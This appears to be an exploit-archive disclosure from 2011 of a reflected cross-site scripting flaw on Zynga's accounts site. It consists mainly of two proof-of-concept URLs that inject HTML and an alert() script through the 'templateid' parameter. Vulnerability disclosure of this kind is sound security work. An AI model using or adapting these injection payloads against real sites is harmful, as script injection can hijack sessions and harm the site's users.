Home / exploits Zynga Cross Site Scripting
Posted on 02 August 2011
_______ ________________ __ _____________ _______ _ _ \______ | _/_ \______ __ _ __ \_ __ / /_ / /_ / / |/ /| | / / ______ / / / | | / \_/ \_/ / /| < | | / / /_____/ / |__| \_____ /\_____ /____/ |__|_ |___| /____/ /\_/ / / / ------------------------------------------------------------------------------------------------------------------------------------------------- Title: Zynga (accounts)Cross site scripting vulnerability vendor: www.zynga.com Author: Raghavendra Karthik D (r007k17-w) Email: n4gb07@gmail.com My blog: http://shadowrootkit.wordpress.com/ Google Dork:© 2011 Zynga, Inc -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * Cross Site Scripting vulnerability Demo: 1.HTML injection: http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cfont%20size=22%20name=calibri%3EXSS%20BUG%20DETECTED!!%20%3C/font%3E 2.JavaScript injection: http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cscript%3Ealert%28%22XSSed_by_Raghavendra_Karthik_D%22%29%3C/script%3E ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- gr33t1ngs to s1d3-3ff3cts and 3psilonlambda and all my friends.
